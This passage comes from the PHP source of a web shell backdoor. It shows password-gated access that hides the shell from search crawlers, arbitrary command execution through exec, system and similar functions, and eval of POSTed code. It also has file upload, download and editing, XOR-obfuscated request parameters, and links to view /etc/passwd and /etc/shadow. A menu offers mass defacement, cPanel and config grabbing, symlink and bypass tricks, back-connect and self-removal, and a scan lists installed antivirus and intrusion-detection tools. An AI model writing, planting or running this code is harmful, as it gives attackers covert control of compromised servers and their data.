prototype(md5($_SERVER[\'HTTP_HOST\']), $▛);\r\n if (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])]) || ($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])] != $▛))\r\n hardLogin();\r\n}\r\nif(!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\']))\r\n $_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$▘;\r\nfunction hardLogin() {\r\n\t\tif(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\r\n\t\t $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");\r\n\t\t if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\r\n\t\t header(\'HTTP/1.0 404 Not Found\');\r\n\t\t exit;\r\n\t\t }\r\n\t\t}\r\n\tdie("</br></br></br>\r\n\t\r\n\t<style>\r\n\tbody {background-color:#000000; color:#e1e1e1; margin:0; font:normal 75% Open Sans, sans-serif; background-image:url(\'https://i.imgur.com/hLcQCBx.gif\'); } </style><body><pre align=center><form method=post style=\'color:#ffffff;text-align: center;\'><img src=\'https://i.imgur.com/4Fq8k1E.png\' align=\'center\'><br><br><input type=password name=pass style=\'background-color:whitesmoke;border:1px solid #FFF;outline:none;\' required><input type=submit name=\'watching\' value=\'>>\' style=\'border:none;background-color:#1e252e;color:#fff;cursor:pointer; \'></form></pre> </body>");\r\n}\r\nif(strtolower(substr(PHP_OS,0,3)) == "win")\r\n\t$os = \'win\';\r\nelse\r\n\t$os = \'nix\';\r\n$safe_mode = @ini_get(\'safe_mode\');\r\nif(!$safe_mode)\r\n error_reporting(0);\r\n$disable_functions = @ini_get(\'disable_functions\');\r\n$home_cwd = @getcwd();\r\nif(isset($_POST[\'c\']))\r\n\t@chdir($_POST[\'c\']);\r\n$cwd = @getcwd();\r\nif($os == \'win\') {\r\n\t$home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n\t$cwd = str_replace("\\\\", "/", $cwd);\r\n}\r\nif($cwd[strlen($cwd)-1] != \'/\')\r\n\t$cwd .= \'/\';\r\n\r\nfunction hardHeader() {\r\n\tif(empty($_POST[\'charset\']))\r\n\t\t$_POST[\'charset\'] = $GLOBALS[\'▜\'];\r\n\techo "<html><head><meta http-equiv=\'Content-Type\' content=\'text/html; charset=" . $_POST[\'charset\'] . "\'><title> " . VERSION ."</title>\r\n\t<link href=\'https://fonts.googleapis.com/css?family=Open+Sans\' rel=\'stylesheet\'>\r\n<style>\r\n\tbody {background-color:#000000; color:#e1e1e1; margin:0; font:normal 75% Open Sans, sans-serif; background-image:url(\'https://i.imgur.com/hLcQCBx.gif\'); } \r\n\t\r\n\tcanvas{ display: block; vertical-align: bottom;}\r\n\t#particles-js{width: 100%; height: 100px; background-color: #000000; background-image: url(\'\'); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}\r\n\tbody,td,th\t{font:10pt Open Sans, sans-serif;margin:0;vertical-align:top;}\r\n\ttable.infoo\t{color:#ffffff; background-image: url(\'https://i.imgur.com/gL0UG8Y.png\'); background-position: center; background-repeat:no-repeat; -webkit-background-size: cover;\t-moz-background-size: cover; -o-background-size: cover;\tbackground-size: 80%; }\r\n\ttable.info\t{color:#ffffff;}\r\n\ttable#toolsTbl {background-color: #000000; background-image:url(\'https://i.imgur.com/hLcQCBx.gif\'); }\r\n\tspan,h1,a\t{color:#ff1111 !important;}\r\n\tspan\t\t{font-weight:bolder;}\r\n\th1\t\t\t{border-left:5px solid #ff1111;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px; }\r\n\tdiv.content\t{padding:5px;margin-left:5px;background-color:#000000; background-image:url(\'https://i.imgur.com/hLcQCBx.gif\');}\r\n\ta\t\t\t{text-decoration:none;}\r\n\ta:hover\t\t{text-decoration:underline;}\r\n\t.tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}\r\n\t.tooltip:hover::after {opacity:1;visibility:visible;}\r\n\t.ml1\t\t{border:1px solid #202832;padding:5px;margin:0;overflow:auto;}\r\n\t.bigarea\t{min-width:100%;max-width:100%;height:400px;}\r\n\tinput, textarea, select\t{margin:0;color:#fff;background-color:#202832;border:none;font:9pt Open Sans, sans-serif;outline:none; }\r\n\tlabel {position:relative}\r\n\tlabel:after {content:\'<>\';font:10px \'Open Sans\', sans-serif, monospace;color:#fff;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px; top:3px;padding:0;position:absolute;pointer-events:none;}\r\n\tlabel:before {content:\'\';right:0; top:0;width:17px; height:17px;background:#202832;position:absolute;pointer-events:none;display:block;}\r\n\tform\t\t{margin:0px;}\r\n\t#toolsTbl\t{text-align:center;}\r\n\t#fak \t\t{background:none;}\r\n\t#fak td \t{padding:5px 0 0 0;}\r\n\tiframe\t\t{border:1px solid #000000;}\r\n\t.toolsInp\t{width:300px}\r\n\t.main th\t{text-align:left;background-color:#000000;}\r\n\t.main tr:hover{background-color:#373c42;}\r\n\t.main td, th{vertical-align:middle;}\r\n\tinput[type=\'submit\']{background-color:#ff1111;}\r\n\tinput[type=\'button\']{background-color:#ff1111;}\r\n\tinput[type=\'submit\']:hover{background-color:#ff1111;}\r\n\tinput[type=\'button\']:hover{background-color:#ff1111;}\r\n\t.l1\t\t\t{background-color:#202832;}\r\n\tpre\t\t\t{font:9pt \'Open Sans\', sans-serif;}\r\n</style>\r\n<script>\r\n var c_ = \'" . htmlspecialchars($GLOBALS[\'cwd\']) . "\';\r\n var a_ = \'" . htmlspecialchars(@$_POST[\'a\']) ."\'\r\n var charset_ = \'" . htmlspecialchars(@$_POST[\'charset\']) ."\';\r\n var p1_ = \'" . ((strpos(@$_POST[\'p1\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p1\'],ENT_QUOTES)) ."\';\r\n var p2_ = \'" . ((strpos(@$_POST[\'p2\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p2\'],ENT_QUOTES)) ."\';\r\n var p3_ = \'" . ((strpos(@$_POST[\'p3\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p3\'],ENT_QUOTES)) ."\';\r\n var d = document;\r\n\tfunction encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr=\'\';var enc_str=\'\';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}\r\n\tfunction utf8_encode(argString){var string=(argString+\'\');var utftext=\'\',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}\r\n\tfunction base64_encode(data){var b64 = \'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc=\'\',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+\'\');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join(\'\');switch (data.length%3){case 1:enc=enc.slice(0,-2)+\'==\';break;case 2:enc=enc.slice(0,-1)+\'=\';break;}return enc;}\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n\t\td.mf.a.value = encrypt(d.mf.a.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');\r\n\t\td.mf.c.value = encrypt(d.mf.c.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');\r\n\t\td.mf.p1.value = encrypt(d.mf.p1.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');\r\n\t\td.mf.p2.value = encrypt(d.mf.p2.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');\r\n\t\td.mf.p3.value = encrypt(d.mf.p3.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');\r\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t}\r\n\tfunction g(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\td.mf.submit();\r\n\t}\r\n\tfunction a(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\tvar params = \'ajax=true\';\r\n\t\tfor(i=0;i<d.mf.elements.length;i++)\r\n\t\t\tparams += \'&\'+d.mf.elements[i].name+\'=\'+encodeURIComponent(d.mf.elements[i].value);\r\n\t\tsr(\'" . addslashes($_SERVER[\'REQUEST_URI\']) ."\', params);\r\n\t}\r\n\tfunction sr(url, params) {\r\n\t\tif (window.XMLHttpRequest)\r\n\t\t\treq = new XMLHttpRequest();\r\n\t\telse if (window.ActiveXObject)\r\n\t\t\treq = new ActiveXObject(\'Microsoft.XMLHTTP\');\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n req.open(\'POST\', url, true);\r\n req.setRequestHeader (\'Content-Type\', \'application/x-www-form-urlencoded\');\r\n req.send(params);\r\n }\r\n\t}\r\n\tfunction processReqChange() {\r\n\t\tif( (req.readyState == 4) )\r\n\t\t\tif(req.status == 200) {\r\n\t\t\t\tvar reg = new RegExp(\\"(\\\\\\\\d+)([\\\\\\\\S\\\\\\\\s]*)\\", \'m\');\r\n\t\t\t\tvar arr=reg.exec(req.responseText);\r\n\t\t\t\teval(arr[2].substr(0, arr[1]));\r\n\t\t\t} else alert(\'Request error!\');\r\n\t}\r\n</script>\r\n<head><body><div style=\'position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;\'>\r\n<form method=post name=mf style=\'display:none;\'>\r\n<input type=hidden name=a>\r\n<input type=hidden name=c>\r\n<input type=hidden name=p1>\r\n<input type=hidden name=p2>\r\n<input type=hidden name=p3>\r\n<input type=hidden name=charset>\r\n</form>";\r\n\t$freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n\t$totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n\t$totalSpace = $totalSpace?$totalSpace:1;\r\n\t$release = @php_uname(\'r\');\r\n\t$kernel = @php_uname(\'s\');\r\n\t$explink = \'https://www.exploit-db.com/search/?action=search&description=\';\r\n\tif(strpos(\'Linux\', $kernel) !== false)\r\n\t\t$explink .= urlencode(\'Linux Kernel \' . substr($release,0,6));\r\n\telse\r\n\t\t$explink .= urlencode($kernel . \' \' . substr($release,0,3));\r\n\tif(!function_exists(\'posix_getegid\')) {\r\n\t\t$user = @get_current_user();\r\n\t\t$uid = @getmyuid();\r\n\t\t$gid = @getmygid();\r\n\t\t$group = "?";\r\n\t} else {\r\n\t\t$uid = @posix_getpwuid(@posix_geteuid());\r\n\t\t$gid = @posix_getgrgid(@posix_getegid());\r\n\t\t$user = $uid[\'name\'];\r\n\t\t$uid = $uid[\'uid\'];\r\n\t\t$group = $gid[\'name\'];\r\n\t\t$gid = $gid[\'gid\'];\r\n\t}\r\n\t$cwd_links = \'\';\r\n\t$path = explode("/", $GLOBALS[\'cwd\']);\r\n\t$n=count($path);\r\n\tfor($i=0; $i<$n-1; $i++) {\r\n\t\t$cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n\t\tfor($j=0; $j<=$i; $j++)\r\n\t\t\t$cwd_links .= $path[$j].\'/\';\r\n\t\t$cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n\t}\r\n\t$charsets = array(\'Windows-1251\', \'UTF-8\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n\t$opt_charsets = \'\';\r\n\tforeach($charsets as $▟)\r\n\t\t$opt_charsets .= \'<option value="\'.$▟.\'" \'.($_POST[\'charset\']==$▟?\'selected\':\'\').\'>\'.$▟.\'</option>\';\r\n\t$m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Mass Deface\'=>\'Sql\',\'Adminer\'=>\'Adminer\',\'Terminal\'=>\'Console\',\'Mass User\'=>\'Edituser\',\'Grab Cpanel\'=>\'Php\',\'Get Configs\'=>\'SafeMode\',\'Symlink\'=>\'Sym\',\'Jumping\'=>\'StringTools\',\'Cgi Telnet\'=>\'Bruteforce\',\'Bypass\'=>\'bypas\',\'BC\'=>\'Network\');\r\n\tif(!empty($GLOBALS[\'▛\']))\r\n\tif (isset($_REQUEST[\'xd\'])) {\r\n\t\t$m[\'Reseller\'] = \'Reseller\'; }\r\n\t$m[\'Logout\'] = \'Logout\';\r\n\t$m[\'Self Remove\'] = \'SelfRemove\';\r\n\t$menu = \'\';\r\n\tforeach($m as $k => $v)\r\n\t\t$menu .= \'<th>[ <a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a> ]</th>\';\r\n\t$drives = "";\r\n\tif ($GLOBALS[\'os\'] == \'win\') {\r\n\t\tforeach(range(\'c\',\'z\') as $drive)\r\n\t\tif (is_dir($drive.\':\\\\\'))\r\n\t\t\t$drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n\t}\r\n\t/* (С) 08.2015 dmkcv */\r\n\techo \'<table class=infoo cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:\'.($GLOBALS[\'os\'] == \'win\'?\'<br>Drives:\':\'\').\'</span></td>\'.\r\n\t\t \'<td><nobr>\'.substr(@php_uname(), 0, 120).\' <a href="https://anon.click/protected/https://www.google.com/search?q=\'.urlencode(@php_uname()).\'" target="_blank">[ Google ]</a> <a href="\'.$explink.\'" target=_blank>[ Exploit-DB ]</a></nobr><br>\'.$uid.\' ( \'.$user.\' ) <span>Group:</span> \'.$gid.\' ( \' .$group. \' )<br>\'.@phpversion().\' <span>Safe mode:</span> \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=#ffffff><b>OFF</b></font>\').\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a> <span>Datetime:</span> \'.date(\'Y-m-d H:i:s\').\'<br>\'.viewSize($totalSpace).\' <span>Free:</span> \'.viewSize($freeSpace).\' (\'.round(100/($totalSpace/$freeSpace),2).\'%)<br>\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a><br>\'.$drives.\'</td>\'.\r\n\t\t \'<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">\'.$opt_charsets.\'</select></label><br><span>Server IP:</span><br>\'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br><span>Client IP:</span><br>\'.$_SERVER[\'REMOTE_ADDR\'].\'</nobr></td></tr></table>\'.\r\n\t\t \'<table style="background-color:#373c42;" cellpadding=3 cellspacing=0 width=100%><tr>\'.$menu.\'</tr></table><div>\';\r\n}\r\nfunction hardFooter() {\r\n\t$is_writable = is_writable($GLOBALS[\'cwd\'])?" <font color=\'#ffffff\'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>";\r\n echo "\r\n</div>\r\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>\r\n\t<tr>\r\n\t\t<td><form onsubmit=\\"".( function_exists(\'actionFilesMan\')? "g(null,this.c.value,\'\');":\'\' )."return false;\\"><span>Change dir:</span><br><input class=\'toolsInp\' type=text name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=submit value=\'submit\'></form></td>\r\n\t\t<td><form onsubmit=\\"".(function_exists(\'actionFilesTools\')? "g(\'FilesTools\',null,this.f.value);":\'\' )."return false;\\"><span>Read file:</span><br><input class=\'toolsInp\' type=text name=f required><input type=submit value=\'submit\'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\\"".( function_exists(\'actionFilesMan\')? "g(\'FilesMan\',null,\'mkdir\',this.d.value);":\'\' )."return false;\\"><span>Make dir:</span>$is_writable<br><input class=\'toolsInp\' type=text name=d required><input type=submit value=\'submit\'></form></td>\r\n\t\t<td><form onsubmit=\\"".( function_exists(\'actionFilesTools\')? "g(\'FilesTools\',null,this.f.value,\'mkfile\');":\'\' )."return false;\\"><span>Make file:</span>$is_writable<br><input class=\'toolsInp\' type=text name=f required><input type=submit value=\'submit\'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\\"".( function_exists(\'actionConsole\')? "g(\'Console\',null,this.c.value);":\'\' )."return false;\\"><span>Execute:</span><br><input class=\'toolsInp\' type=text name=c value=\'\'><input type=submit value=\'submit\'></form></td>\r\n\t\t<td><form method=\'post\' ".( (!function_exists(\'actionFilesMan\'))? " onsubmit=\\"return false;\\" ":\'\' )."ENCTYPE=\'multipart/form-data\'>\r\n\t\t<input type=hidden name=a value=\'FilesMan\'>\r\n\t\t<input type=hidden name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'>\r\n\t\t<input type=hidden name=p1 value=\'uploadFile\'>\r\n\t\t<input type=hidden name=ne value=\'\'>\r\n\t\t<input type=hidden name=charset value=\'" . (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') . "\'>\r\n\t\t<span>Upload file:</span>$is_writable<br><input class=\'toolsInp\' type=file name=f[] multiple><input type=submit value=\'submit\'></form><br ></td>\r\n\t</tr></table></div>\r\n\t\r\n\t\r\n\t</body></html>";\r\n}\r\nif (!function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) { function posix_getpwuid($p) {return false;} }\r\nif (!function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) { function posix_getgrgid($p) {return false;} }\r\nfunction ex($in) {\r\n\t$▖ = \'\';\r\n\tif (function_exists(\'exec\')) {\r\n\t\t@exec($in,$▖);\r\n\t\t$▖ = @join("\\n",$▖);\r\n\t} elseif (function_exists(\'passthru\')) {\r\n\t\tob_start();\r\n\t\t@passthru($in);\r\n\t\t$▖ = ob_get_clean();\r\n\t} elseif (function_exists(\'system\')) {\r\n\t\tob_start();\r\n\t\t@system($in);\r\n\t\t$▖ = ob_get_clean();\r\n\t} elseif (function_exists(\'shell_exec\')) {\r\n\t\t$▖ = shell_exec($in);\r\n\t} elseif (is_resource($f = @popen($in,"r"))) {\r\n\t\t$▖ = "";\r\n\t\twhile(!@feof($f))\r\n\t\t\t$▖ .= fread($f,1024);\r\n\t\tpclose($f);\r\n\t}else return "↳ Unable to execute command\\n";\r\n\treturn ($▖==\'\'?"↳ Query did not return anything\\n":$▖);\r\n}\r\nfunction viewSize($s) {\r\n\tif($s >= 1073741824)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n\telseif($s >= 1048576)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n\telseif($s >= 1024)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n\telse\r\n\t\treturn $s . \' B\';\r\n}\r\nfunction perms($p) {\r\n\tif (($p & 0xC000) == 0xC000)$i = \'s\';\r\n\telseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n\telseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n\telseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n\telseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n\telseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n\telseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n\telse $i = \'u\';\r\n\t$i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n\t$i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n\t$i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n\treturn $i;\r\n}\r\nfunction viewPermsColor($f) {\r\n\tif (!@is_readable($f))\r\n\t\treturn \'<font color=#ff1111><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n\telseif (!@is_writable($f))\r\n\t\treturn \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n\telse\r\n\t\treturn \'<font color=#ffffff><b>\'.perms(@fileperms($f)).\'</b></font>\';\r\n}\r\nfunction hardScandir($dir) {\r\n if(function_exists("scandir")) {\r\n return scandir($dir);\r\n } else {\r\n $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh)))\r\n $files[] = $filename;\r\n return $files;\r\n }\r\n}\r\nfunction which($p) {\r\n\t$path = ex(\'which \' . $p);\r\n\tif(!empty($path))\r\n\t\treturn $path;\r\n\treturn false;\r\n}\r\n\r\n\r\nfunction actionRC() {\r\n\tif(!@$_POST[\'p1\']) {\r\n\t\t$a = array(\r\n\t\t\t"uname" => php_uname(),\r\n\t\t\t"php_version" => phpversion(),\r\n\t\t\t"VERSION" => VERSION,\r\n\t\t\t"safemode" => @ini_get(\'safe_mode\')\r\n\t\t);\r\n\t\techo serialize($a);\r\n\t} else {\r\n\t\teval($_POST[\'p1\']);\r\n\t}\r\n}\r\nfunction prototype($k, $v) {\r\n $_COOKIE[$k] = $v;\r\n setcookie($k, $v);\r\n}\r\nfunction actionSecInfo() {\r\n\thardHeader();\r\n\techo \'<h1>Server security information</h1><div class=content>\';\r\n\tfunction showSecParam($n, $v) {\r\n\t\t$v = trim($v);\r\n\t\tif($v) {\r\n\t\t\techo \'<span>\' . $n . \': </span>\';\r\n\t\t\tif(strpos($v, "\\n") === false)\r\n\t\t\t\techo $v . \'<br>\';\r\n\t\t\telse\r\n\t\t\t\techo \'<pre class=ml1>\' . $v . \'</pre>\';\r\n\t\t}\r\n\t}\r\n\tshowSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n if(function_exists(\'apache_get_modules\'))\r\n showSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules()));\r\n\tshowSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');\r\n\tshowSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n\tshowSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n\tshowSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n\tshowSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n\t$temp=array();\r\n\tif(function_exists(\'mysql_get_client_info\'))\r\n\t\t$temp[] = "MySql (".mysql_get_client_info().")";\r\n\tif(function_exists(\'mssql_connect\'))\r\n\t\t$temp[] = "MSSQL";\r\n\tif(function_exists(\'pg_connect\'))\r\n\t\t$temp[] = "PostgreSQL";\r\n\tif(function_exists(\'oci_connect\'))\r\n\t\t$temp[] = "Oracle";\r\n\tshowSecParam(\'Supported databases\', implode(\', \', $temp));\r\n\techo \'<br>\';\r\n\tif($GLOBALS[\'os\'] == \'nix\') {\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) {\r\n $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $▟)\r\n if(which($▟))\r\n $temp[] = $▟;\r\n showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $▟)\r\n if(which($▟))\r\n $temp[] = $▟;\r\n showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $▟)\r\n if(which($▟))\r\n $temp[] = $▟;\r\n showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n\t\t\t\tshowSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n }\r\n\t} else {\r\n\t\tshowSecParam(\'OS Version\',ex(\'ver\'));\r\n\t\tshowSecParam(\'Account Settings\', iconv(\'CP866\', \'UTF-8\',ex(\'net accounts\')));\r\n\t\tshowSecParam(\'User Accounts\', iconv(\'CP866\', \'UTF-8\',ex(\'net user\')));\r\n\t}\r\n\techo \'</div>\';\r\n\thardFooter();\r\n}\r\nfunction actionFilesTools() {\r\n\tif( isset($_POST[\'p1\']) )\r\n\t\t$_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n\tif(@$_POST[\'p2\']==\'download\') {\r\n\t\tif(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) {\r\n\t\t\tob_start("ob_gzhandler", 4096);\r\n\t\t\theader("Content-Disposition: attachment; filename=".basename($_POST[\'p1\']));\r\n\t\t\tif (function_exists("mime_content_type")) {\r\n\t\t\t\t$type = @mime_content_type($_POST[\'p1\']);\r\n\t\t\t\theader("Content-Type: " . $type);\r\n\t\t\t} else\r\n header("Content-Type: application/octet-stream");\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], "r");\r\n\t\t\tif($fp) {\r\n\t\t\t\twhile(!@feof($fp))\r\n\t\t\t\t\techo @fread($fp, 1024);\r\n\t\t\t\tfclose($fp);\r\n\t\t\t}\r\n\t\t}exit;\r\n\t}\r\n\tif( @$_POST[\'p2\'] == \'mkfile\' ) {\r\n\t\tif(!file_exists($_POST[\'p1\'])) {\r\n\t\t\t$fp = @fopen($_POST[\'p1\'], \'w\');\r\n\t\t\tif($fp) {\r\n\t\t\t\t$_POST[\'p2\'] = "edit";\r\n\t\t\t\tfclose($fp);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\thardHeader();\r\n\techo \'<h1>File tools</h1><div class=content>\';\r\n\tif( !file_exists(@$_POST[\'p1\']) ) {\r\n\t\techo \'File not exists\';\r\n\t\thardFooter();\r\n\t\treturn;\r\n\t}\r\n\t$uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n\tif(!$uid) {\r\n\t\t$uid[\'name\'] = @fileowner($_POST[\'p1\']);\r\n\t\t$gid[\'name\'] = @filegroup($_POST[\'p1\']);\r\n\t} else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\']));\r\n\techo \'<span>Name:</span> \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' 